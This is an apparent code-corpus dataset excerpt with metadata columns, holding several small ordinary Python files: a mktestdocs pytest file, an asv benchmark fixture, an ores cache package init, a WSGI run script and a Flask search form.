koaning/mktestdocs
|
96bfc7e43cf6d14053db215b183ba68d9df6c616
|
[
"Apache-2.0"
] | 5
|
2021-07-20T17:22:09.000Z
|
2021-12-23T14:12:46.000Z
|
import pytest
from mktestdocs import check_codeblock, grab_code_blocks
# Docstring fixtures: exibit_a has no fenced code block, exibit_b has one
# ``python``-tagged block, and exibit_c mixes an untagged fence with a
# ``python``-tagged one (so counts differ by `lang` filter).
exibit_a = """
This is an example docstring.
Arguments:
a: a parameter
There is no example
"""
exibit_b = """
This is an example docstring.
Arguments:
a: a parameter
```python
assert 1 == 1
```
"""
exibit_c = """
This is an example docstring.
Arguments:
a: a parameter
```
assert 1 == 1
```
```python
assert 1 == 1
```
"""
@pytest.mark.parametrize(
    "doc, n",
    [(exibit_a, 0), (exibit_b, 1), (exibit_c, 1)],
    ids=["exibit_a", "exibit_b", "exibit_c"],
)
def test_number_of_codeblocks(doc, n):
    """Only fenced blocks explicitly tagged ``python`` are collected."""
    python_blocks = grab_code_blocks(doc, lang="python")
    assert len(python_blocks) == n
@pytest.mark.parametrize(
    "doc, n",
    [(exibit_a, 0), (exibit_b, 1), (exibit_c, 2)],
    ids=["exibit_a", "exibit_b", "exibit_c"],
)
def test_number_of_codeblocks_any(doc, n):
    """With ``lang=None`` every fenced block is collected, tagged or not."""
    all_blocks = grab_code_blocks(doc, lang=None)
    assert len(all_blocks) == n
| 15.842105
| 57
| 0.634551
| 133
| 903
| 4.090226
| 0.308271
| 0.064338
| 0.077206
| 0.082721
| 0.724265
| 0.724265
| 0.724265
| 0.724265
| 0.724265
| 0.356618
| 0
| 0.016575
| 0.198228
| 903
| 56
| 58
| 16.125
| 0.734807
| 0
| 0
| 0.658537
| 0
| 0
| 0.403101
| 0
| 0
| 0
| 0
| 0
| 0.121951
| 1
| 0.04878
| false
| 0
| 0.04878
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
9075b8f0a39d008054f44545d40bdbab7bab33de
| 555
|
py
|
Python
|
test/benchmark/named.py
|
asnramos/asv
|
8a0979b532d06c7c352826e2acf0dd872922260e
|
[
"BSD-3-Clause"
] | null | null | null |
test/benchmark/named.py
|
asnramos/asv
|
8a0979b532d06c7c352826e2acf0dd872922260e
|
[
"BSD-3-Clause"
] | null | null | null |
test/benchmark/named.py
|
asnramos/asv
|
8a0979b532d06c7c352826e2acf0dd872922260e
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
class Suite:
    """Benchmark suite whose method is published under a custom name."""

    def named_method(self):
        return 0
    # asv reports this benchmark as ``custom.track_method`` instead of the
    # derived module.Suite.named_method name.
    named_method.benchmark_name = 'custom.track_method'
def named_function():
    """No-op benchmark body used to test name/title overrides."""
    pass
# Override both the benchmark id and its human-readable display title.
named_function.benchmark_name = 'custom.time_function'
named_function.pretty_name = 'My Custom Function'
def track_custom_pretty_name():
    """Tracking benchmark with a default id but a custom display title."""
    return 42
# pretty_name changes only how the benchmark is shown in reports.
track_custom_pretty_name.pretty_name = 'this.is/the.answer'
class BaseSuite:
    """Holds a plain method that other suites re-expose as a benchmark."""

    def some_func(self):
        return 0
class OtherSuite:
    """Exposes BaseSuite.some_func as a tracking benchmark by aliasing it."""

    # The track_ prefix makes asv discover the borrowed method here.
    track_some_func = BaseSuite.some_func
| 16.323529
| 63
| 0.735135
| 77
| 555
| 5.025974
| 0.467532
| 0.103359
| 0.056848
| 0.108527
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011111
| 0.189189
| 555
| 33
| 64
| 16.818182
| 0.848889
| 0.10991
| 0
| 0.125
| 0
| 0
| 0.152439
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.0625
| 0
| 0.1875
| 0.6875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 4
|
907faeb95020b9a54177f73cacc144571e97126a
| 150
|
py
|
Python
|
ores/score_caches/__init__.py
|
ureesoriano/ores
|
dda9db6c8737d12acbae5b0d43938d93c9e7ea8e
|
[
"MIT"
] | null | null | null |
ores/score_caches/__init__.py
|
ureesoriano/ores
|
dda9db6c8737d12acbae5b0d43938d93c9e7ea8e
|
[
"MIT"
] | null | null | null |
ores/score_caches/__init__.py
|
ureesoriano/ores
|
dda9db6c8737d12acbae5b0d43938d93c9e7ea8e
|
[
"MIT"
] | null | null | null |
from .score_cache import ScoreCache
from .empty import Empty
from .lru import LRU
from .redis import Redis
# BUGFIX: __all__ must contain *names* (strings), not the objects
# themselves -- Python 3 raises "Item in __all__ must be str" on
# `from ores.score_caches import *` when non-strings are listed.
__all__ = ["ScoreCache", "Empty", "LRU", "Redis"]
| 21.428571
| 41
| 0.78
| 22
| 150
| 5.090909
| 0.409091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153333
| 150
| 6
| 42
| 25
| 0.88189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
908a352545ef8649c4693a39d1825c220c064536
| 64
|
py
|
Python
|
runserver.py
|
remram44/internetpoints
|
baae55c4629e0e6d422e60b6ebe4f21d9f63bcef
|
[
"Apache-2.0"
] | 1
|
2021-01-04T00:26:25.000Z
|
2021-01-04T00:26:25.000Z
|
runserver.py
|
remram44/internetpoints
|
baae55c4629e0e6d422e60b6ebe4f21d9f63bcef
|
[
"Apache-2.0"
] | null | null | null |
runserver.py
|
remram44/internetpoints
|
baae55c4629e0e6d422e60b6ebe4f21d9f63bcef
|
[
"Apache-2.0"
] | null | null | null |
# Entry point: import the project's WSGI application object and serve it
# with the framework's built-in development server (blocking call).
from internetpoints.wsgi import application
application.run()
| 12.8
| 43
| 0.828125
| 7
| 64
| 7.571429
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 64
| 4
| 44
| 16
| 0.929825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
908ef21c393540e2ae754d67c5cf15887926cfad
| 256
|
py
|
Python
|
dingdian/main/forms.py
|
yokonsan/dingdian
|
c1631b0a0dd0a5a6355d4e7f08330ee36c5cbcff
|
[
"MIT"
] | 7
|
2021-03-03T01:42:13.000Z
|
2021-09-04T13:16:16.000Z
|
dingdian/main/forms.py
|
yokonsan/dingdian
|
c1631b0a0dd0a5a6355d4e7f08330ee36c5cbcff
|
[
"MIT"
] | null | null | null |
dingdian/main/forms.py
|
yokonsan/dingdian
|
c1631b0a0dd0a5a6355d4e7f08330ee36c5cbcff
|
[
"MIT"
] | 3
|
2021-02-28T09:24:43.000Z
|
2021-04-18T04:10:34.000Z
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
class SearchForm(FlaskForm):
    """Site search form: a single required text field plus a submit button."""

    # DataRequired rejects empty submissions before the view handles them.
    search_name = StringField('search', validators=[DataRequired()])
    submit = SubmitField('submit')
| 28.444444
| 68
| 0.792969
| 27
| 256
| 7.444444
| 0.555556
| 0.109453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 256
| 8
| 69
| 32
| 0.897321
| 0
| 0
| 0
| 0
| 0
| 0.046875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.